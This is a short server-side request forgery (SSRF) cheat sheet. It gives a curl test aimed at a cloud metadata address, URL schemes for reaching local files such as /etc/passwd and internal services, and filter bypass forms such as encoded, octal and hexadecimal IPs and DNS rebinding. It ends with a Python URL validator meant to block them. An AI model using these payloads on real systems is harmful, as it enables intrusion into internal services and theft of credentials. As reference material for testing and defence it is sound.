# Server-Side Request Forgery (SSRF)

## SSRF Tests (curl)

```bash
curl "http://target.com/api/proxy?url=http://169.254.169.254/"
```

## Exploitation:

* **Internal port scanning**: Attempting to access internal services and ports on the server's localhost.
* **Accessing restricted endpoints**: Bypassing access controls to reach sensitive internal resources.

## Common Protocols for SSRF:

* `http://127.0.0.1/` → Reach HTTP services bound to the loopback interface.
* `file:///etc/passwd` → Access local files.
* `gopher://dateserver.htb:80/...` → Use the gopher protocol to send arbitrary requests.
* `dict://127.0.0.1:11211/info` → Query dictionary services.
* `ftp://127.0.0.1:21` → Access FTP servers.
* `file://` → Access local files.
* `php://` → PHP stream wrappers (highly dangerous).
* `data://` → Inline data URIs (content embedded in the URL itself).
* `https://` → Access internal HTTPS servers.

## Advanced SSRF Bypass Techniques:

* **URL Encoding**: `http://127.0.0.1%3A80`
* **Double Encoding**: `http://127.0.0.1%253A80`
* **Alternative IP Representations**:
  * **Octal**: `http://0177.0.0.1`
  * **Hexadecimal**: `http://0x7F.0x00.0x00.0x01`
  * **IPv6 Abuse**: `http://[::1]:80`
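* **DNS Rebinding**: The hostname's DNS answer changes between the filter's check and the actual request, so the validated name ends up pointing at an internal IP.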
* **Varying Ports**: Bypass filters using different ports.
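
A server-side check for the `url` parameter from the curl test above, written against the schemes and bypass forms listed on this page (added example, not code from the original page). The allowlists, the function names and the injectable `resolve` hook are assumptions for illustration.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}  # assumption: the proxy only fetches web pages
ALLOWED_PORTS = {80, 443}            # assumption: widen only if the app needs it


def system_resolve(host, port):
    """Resolve like the OS would, so octal/hex literals are normalised too."""
    infos = socket.getaddrinfo(host, port, type=socket.SOCK_STREAM)
    return [info[4][0] for info in infos]


def is_internal(addr):
    ip = ipaddress.ip_address(addr)
    if ip.version == 6 and ip.ipv4_mapped:      # e.g. ::ffff:127.0.0.1
        ip = ip.ipv4_mapped
    return ip.is_multicast or not ip.is_global  # loopback, RFC 1918, link-local


def check_url(url, resolve=system_resolve):
    """Return (True, pinned_ip) if the URL may be fetched, else (False, reason)."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:     # file, gopher, dict, ftp, php, data
        return False, "scheme not allowed"
    if "%" in parts.netloc:                     # %3A and %253A style authorities
        return False, "encoded characters in authority"
    try:
        port = parts.port
    except ValueError:
        return False, "malformed port"
    if port is None:
        port = 443 if parts.scheme == "https" else 80
    if not parts.hostname or port not in ALLOWED_PORTS:
        return False, "host missing or port not allowed"
    try:
        addrs = resolve(parts.hostname, port)
    except (OSError, UnicodeError):
        return False, "resolution failed"
    # Reject if ANY answer is internal, not just the first one.
    if not addrs or any(is_internal(a) for a in addrs):
        return False, "resolves to internal address"
    # Connect to this exact IP (keeping Host/SNI as the hostname) instead of
    # resolving again, so a later DNS change cannot redirect the request.
    return True, addrs[0]
```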
